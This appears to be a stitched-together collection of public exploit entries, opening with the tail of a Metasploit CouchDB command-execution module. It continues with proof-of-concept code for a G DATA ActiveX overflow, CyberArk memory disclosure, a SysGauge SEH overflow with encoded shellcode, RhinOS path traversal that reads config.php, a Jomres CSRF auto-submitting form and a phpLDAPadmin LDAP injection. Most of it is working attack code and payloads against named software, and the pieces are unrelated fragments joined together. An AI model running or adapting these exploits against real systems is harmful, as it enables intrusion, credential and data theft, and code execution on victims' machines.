'data' => %("/bin/sh #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"})
)
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
end
end
<!--
=====[ Tempest Security Intelligence - ADV-24/2018 ]===
G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
Author: Filipe Xavier Oliveira
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]=====================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
=====[ Overview]==============================================================
* System affected : G DATA TOTAL SECURITY [1].
* Software Version : 25.4.0.3 (other versions may also be affected).
* Impact : A user may be affected by opening a malicious black list
email in the antispam filter,
=====[ Detailed description]==================================================
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.
Through a long input in a member of class called Antispam, isblackedlist
class is vulnerable a buffer overflow.
A poc that causes a buffer overflow :
-->
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
memberName = "IsBlackListed"
progid = "GDASPAMLib.AntiSpam"
argCount = 1
arg1=String(14356, "A")
target.IsBlackListed arg1
</script></job></package>
<!--
=====[ Timeline of disclosure]===============================================
04/10/2018 - Vulnerability reported.
04/17/2018 - The vendor will fix the vulnerability.
05/24/2017 - Vulnerability fixed.
07/12/2018 - CVE assigned [1]
=====[ Thanks & Acknowledgements]============================================
- Tempest Security Intelligence / Tempest's Pentest Team [3]
=====[ References]===========================================================
[1] https://www.gdatasoftware.com/
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018
[3] http://www.tempest.com.br
=====[ EOF]====================================================================
-->
# Exploit Title: CyberArk < 10 - Memory Disclosure
# Date: 2018-06-04
# Exploit Author: Thomas Zuk
# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Version: < 9.7 and < 10
# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
# CVE: CVE-2018-9842
# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
# paste the following bytes into a hexedited file named logon.bin:
#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000
#!/usr/bin/python
import socket
import os
import sys
ip = "10.107.32.21"
port = 1858
# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services.
# The below is a sample login request that is needed to receive the memory
pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00"
for iteration in range(0, 110):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(pacli_logon)
# recieve response
s.recv(200)
reply = s.recv(1500)
# write responses to file
file = open("cyberark_memory", "a")
file.write("received: \n")
file.write(reply)
file.write("\n\n\n")
file.close()
s.close()
#!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #
# Tested on : Windows XP Professional - SP3 #
# Steps to reproduce : ~ Copy content of payload.txt #
# ~ Under Register type in "falafel" in Customer Name field #
# ~ Paste the content of payload.txt in Unlock Key field and click Register #
##################################################################################################################
import struct
# ***notes***
# ~ this particular function [Register] of the program only accept characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address
# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
# ~ SysGauge Ultimate v4.6.12
# ~ Azure DEX Pro v2.2.16
# ~ Azure DEX Ultimate v2.2.16
# ~ DiskBoss Pro v9.1.16
# ~ DiskBoss Ultimate v9.1.16
# ~ SyncBreeze Pro v10.7.14
# ~ SyncBreeze Ultimate v10.7.14
# ~ DiskPulse Pro v10.7.14
# ~ DiskPulse Ultimate v10.7.14
# ~ DiskSavvy Pro v10.7.14
# ~ DiskSavvy Ultimate v10.7.14
# ~ DiskSorter Pro v10.7.14
# ~ DiskSorter Ultimate v10.7.14
# ~ DupScout Pro v10.7.14
# ~ DupScout Ultimate v10.7.14
# ~ VX Search Pro v10.7.14
# ~ VX Search Ultimate v10.7.14
##################################################################################################################
# overwrite SEH with clean address of [pop, pop, ret]
buffer = "\x41" * 780 # junk to nSEH
buffer += "\x74\x06\x42\x42" # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16) # SEH (pop esi # pop ecx # retn | [libdgg.dll])
buffer += "\x43" * 28 # some more junk
# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0: 33 c0 xor eax,eax # zero out eax register
# 2: 50 push eax # push eax (null-byte) to terminate "calc.exe"
# 3: 68 2E 65 78 65 push ".exe" # push the ASCII string to the stack
# 8: 68 63 61 6C 63 push "calc" #
# d: 8b c4 mov eax,esp # put the pointer to the ASCII string in eax
# f: 6a 01 push 0x1 # push uCmdShow parameter to the stack
# 11: 50 push eax # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c mov ebx,0x7c862b5d # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3 call ebx # call WinExec()
# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"
# starting from the bottom up in little endian order
# first push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "\x05\x72\x70\x70\x70" ### add eax,0x70707072
buffer += "\x05\x61\x20\x20\x20" ### add eax,0x20202061
buffer += "\x50" ### push eax
##############################################################
# second push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "\x05\x01\x32\x35\x66" ### add eax,0x66353201
buffer += "\x05\x15\x32\x35\x66" ### add eax,0x66353215
buffer += "\x05\x15\x22\x12\x33" ### add eax,0x33122215
buffer += "\x50" ### push eax
##############################################################
# third push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x5d\xbb\x50\x01" into eax and push it to the stack
buffer += "\x05\x01\x30\x65\x36" ### add eax,0x36653001
buffer += "\x05\x01\x20\x56\x27" ### add eax,0x27562001
buffer += "\x48" ### dec eax
buffer += "\x50" ### push eax
##############################################################
# fourth push "\x6a\xc4\x8b\x63"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6a\xc4\x8b\x63" into eax and push it to the stack
buffer += "\x05\x32\x46\x70\x35" ### add eax,0x35544632
buffer += "\x05\x31\x43\x70\x35" ### add eax,0x35704531
buffer += "\x50" ### push eax
##############################################################
# fifth push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "\x05\x34\x32\x31\x36" ### add eax,0x36313234
buffer += "\x05\x34\x31\x30\x36" ### add eax,0x36303134
buffer += "\x50" ### push eax
##############################################################
# sixth push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x65\x78\x65\x2e" into eax and push it to the stack
buffer += "\x05\x17\x33\x34\x33" ### add eax,0x33343317
buffer += "\x05\x17\x32\x44\x32" ### add eax,0x32443217
buffer += "\x50" ### push eax
##############################################################
# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x68\x50\xc0\x33" into eax and push it to the stack
buffer += "\x05\x22\x60\x30\x34" ### add eax,0x34306022
buffer += "\x05\x11\x60\x20\x34" ### add eax,0x34206011
buffer += "\x50" ### push eax
##############################################################
# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\x90" into eax and push it to the stack
buffer += "\x05\x70\x70\x70\x70" ### add eax,0x70707070
buffer += "\x05\x20\x20\x20\x20" ### add eax,0x20202020
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
##############################################################
# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0: 25 10 10 10 10 and eax,0x10101010
# 5: 25 01 01 01 01 and eax,0x1010101
# a: 05 31 70 03 34 add eax,0x34037031
# f: 05 22 70 06 33 add eax,0x33067022
# 14: 50 push eax
buffer += "\x25\x10\x10\x10\x10\x25\x01\x01\x01\x01\x05\x31\x70\x03\x34\x05\x22\x70\x06\x33\x50"
# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "\xff"
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1) ### junk
try:
f=open("payload.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.
- KVA Shadowing should be disabled and the relevant security update should be uninstalled.
- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44697.zip
# Exploit Title: RhinOS CMS 3.x - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.saltos.org/
# Software Link: https://netix.dl.sourceforge.net/project/rhinos/archived/r1190/RhinOS-en-3.0-1190.win32.exe
# Version: 3.1 r0 / 3.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18760
# Users...
# C:/rhinos/demo/admin/php/download.php
#....
#26 $head=0;$main=0;$tail=0;
#27 include("inicio.php");
#28 if(!check_user()) die();
#29 $name=getParam("name");
#30 $file="files/".getParam("file");
#31 $size=getParam("size");
#32 $type=getParam("type");
#33 if(!file_exists($file)) die();
#34 header("Pragma: public");
#35 header("Expires: 0");
#36 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
#37 header("Content-Type: $type");
#38 header("Content-Length: $size");
#39 header("Content-Disposition: attachment; filename=\"$name\"");
#40 header("Content-Transfer-Encoding: binary");
#41 $fp=fopen($file,"rb");
#42 while(!feof($fp)) echo fread($fp,8192);
#43 fclose($fp);
#44 disconnect();
#....
# POC:
# 1)
# http://localhost/[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php
#
GET /[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: remember=0; PHPSESSID=ek24koab445aab70seegi02lh3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 00:23:54 GMT
Server: Apache/2.2.16 (Win32) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 1771
Content-Disposition: attachment; filename="efe.php"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type:
# Exploit Title: Joomla!Component jomres 9.11.2 - Cross site request forgery
# Date: 2018-06-15
# Exploit Author: L0RD
# Vendor Homepage: https://www.jomres.net/
# Software link: https://extensions.joomla.org/extension/jomres/
# Software Download: https://github.com/WoollyinWalesIT/jomres/releases/download/9.11.2/jomres.zip
# Version: 9.11.2
# Tested on: Kali linux
===================================================
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://127.0.0.1/jomres/index.php?cmd=account/index" method="POST">
<input type="hidden" name="password" value="decode" />
<input type="hidden" name="password_verify" value="decode" />
<input type="hidden" name="email" value="borna.nematzadeh123@gmail.com" />
<input type="hidden" name="first_name" value="decode" />
<input type="hidden" name="last_name" value="test" />
<input type="hidden" name="company" value="test" />
<input type="hidden" name="vat_no" value="100000000" />
<input type="hidden" name="address1" value="test1" />
<input type="hidden" name="address2" value="test2" />
<input type="hidden" name="city" value="New York" />
<input type="hidden" name="county" value="test" />
<input type="hidden" name="postalcode" value="100001" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
===================================================
# Exploit Title: phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)
# Google Dork:N/A
# Date: 21.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://phpldapadmin.sourceforge.net
# Software Link: http://phpldapadmin.sourceforge.net
# Version: 1.2.2
# Tested on: Pardus / Debian Web Server
# CVE : N/A
#Vulnerable Code
$server =
$_SESSION[APPCONFIG]->getServer(get_request('server_id','REQUEST'));
if (count($server->untested()))
system_message(array(
#Payload
!(()&&!|*|*|
#PoC 1
http://target/phpldapadmin/cmd.php?cmd=login_form&server_id=1!(()&&!|*|*|&redirect=true
#PoC 2
login panel username use !(()&&!|*|*| password !(()&&!|*|*|